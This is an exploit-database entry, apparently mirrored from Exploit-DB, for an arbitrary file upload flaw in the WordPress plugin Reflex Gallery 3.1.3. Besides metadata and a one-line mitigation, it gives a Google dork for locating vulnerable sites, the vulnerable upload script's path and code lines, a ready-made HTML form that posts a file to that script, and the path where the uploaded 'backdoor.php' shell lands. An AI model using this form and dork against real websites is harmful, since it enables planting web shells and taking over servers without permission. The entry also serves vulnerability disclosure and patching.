header-logo
Suggest Exploit
vendor:
Reflex Gallery
by:
CrashBandicot @DosPerl
7.5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Reflex Gallery
Affected Version From: 3.1.2003
Affected Version To: 3.1.2003
Patch Exists: NO
Related CWE:
CPE: a:wordpress:reflex_gallery:3.1.3
Metasploit:
Other Scripts:
Platforms Tested: Windows
2015

WordPress Plugin Reflex Gallery – Arbitrary File Upload

This exploit allows an attacker to upload arbitrary files to the Reflex Gallery plugin in Wordpress. By manipulating the Year and Month parameters in the GET request, the attacker can specify the folder location for the uploaded file. The vulnerable file is php.php, and the exploit involves uploading a file using a form with the specified parameters.

Mitigation:

Update to a patched version of the Reflex Gallery plugin.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/reflex-gallery/
# Date: 08.03.2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: https://wordpress.org/plugins/reflex-gallery/
# Software Link: https://downloads.wordpress.org/plugin/reflex-gallery.zip
# Version: 3.1.3 (Last)
# Tested on: Windows
 
# p0C : http://i.imgur.com/mj8yADU.png
 
# Path : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
# add Month and Year in GET for Folder of Shell ./wp-content/uploads/" .$_GET['Year'].'/'.$_GET['Month']. "
  
Vulnerable File : php.php
50.      if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
173.         $result = $uploader->handleUpload('../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/');
 
 
# Exploit :
 
<form method="POST" action="http://127.0.0.1:1337/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03" enctype="multipart/form-data" >
    <input type="file" name="qqfile"><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>
 
 
# Shell Path : http://127.0.0.1:1337/wordpress/wp-content/uploads/2015/03/backdoor.php

Navigation

Suggest Exploit

Services By CQR